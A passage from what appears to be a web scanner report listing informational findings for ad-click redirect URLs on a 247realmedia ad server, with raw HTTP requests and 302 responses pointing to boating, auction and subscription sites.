Date: Tue, 25 Jan 2011 14:49:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.239. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1567263834/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1567263834/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1567263834/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1567263834/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.240. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1568256774/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1568256774/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1568256774/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1568256774/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.241. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1588906246/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1588906246/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1588906246/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1588906246/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.242. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1591422292/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1591422292/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1591422292/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1591422292/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.243. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1593051790/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1593051790/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1593051790/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1593051790/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:28:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 402
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S">here</a>
...[SNIP]...

20.244. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1601012463/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1601012463/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1601012463/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1601012463/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.245. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1603321405/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1603321405/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1603321405/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1603321405/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.246. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1608053131/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1608053131/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1608053131/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1608053131/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.247. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609075181/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609075181/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609075181/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609075181/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.248. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609584897/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609584897/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609584897/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609584897/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:00:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.249. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1610500850/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1610500850/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1610500850/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1610500850/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.250. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1616153881/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1616153881/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1616153881/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.flashedition.com/publication?i=59172

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1616153881/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.flashedition.com/publication?i=59172
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.flashedition.com/publication?i=59172">here</a>
...[SNIP]...

20.251. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1616398296/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1616398296/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1616398296/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1616398296/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:15:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.252. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1643229148/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1643229148/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1643229148/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1643229148/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
